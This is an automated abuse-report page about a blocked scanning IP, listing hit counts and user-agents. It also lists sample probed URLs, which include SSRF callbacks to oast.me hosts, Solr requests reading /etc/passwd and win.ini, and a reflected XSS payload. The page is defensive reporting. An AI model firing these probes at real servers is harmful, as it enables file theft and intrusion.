abuseip.org
- Reason
- suspicious paths across 6 domains
- Hits (last hour)
- 90
- Unique targets hit
- 6
- Unique paths probed
- 354
- Detection count
- 27
- First seen
- 2026-06-24 00:53:42 UTC
- Last seen
- 2026-06-24 01:29:15 UTC
- Block expires
- 2026-06-25 02:15:40 UTC
Sample paths probed
- /spcgi.cgi
- /mgmt/shared/iapp/rpm-spec-creator
- /index.php
- /?phonepe_action=curltestPhonePe&url=http://d8ti9df25cps7388rmm0sjk9wesicx8p4.oast.me
- /pentaho/Login
- /?phonepe_action=curltestPhonePe&url=http://d8ti9df25cps7388rmm0k85aujrpembqo.oast.me
- /wp-admin/admin-ajax.php
- /?phonepe_action=curltestPhonePe&url=http://d8ti9df25cps7388rmm05gfx1hcqd6814.oast.me
- /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://c:/windows/win.ini
- /cgi-bin/ExportLogs.sh
- /api/2.0/mlflow/registered-models/create
- /
- /?skw=%22%20onfocus%3D%22alert%28document.domain%29%22%20autofocus%3D%22
- /?phonepe_action=curltestPhonePe&url=http://d8ti9df25cps7388rmm0qzzdwtaicfrhr.oast.me
- /api/jolokia/list/org.apache.logging.log4j2
- /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10
- /?phonepe_action=curltestPhonePe&url=http://d8ti9df25cps7388rmm088qaa4pw3o87o.oast.me
- /?phonepe_action=curltestPhonePe&url=http://d8ti9df25cps7388rmm0cpjuahwmy8e8h.oast.me
- /api/2.0/mlflow/model-versions/create
- /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd
Sample User-Agents
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Edg/135.0.0.0
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:137.0) Gecko/20100101 Firefox/137.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/1.6.5 Chrome/124.0.6367.243 Electron/30.1.2 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36
- Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) obsidian/1.8.9 Chrome/132.0.6834.210 Electron/34.3.0 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36 Edg/149.0.0.0
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 OPR/118.0.0.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.5 Safari/605.1.15
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
- Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36
- Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.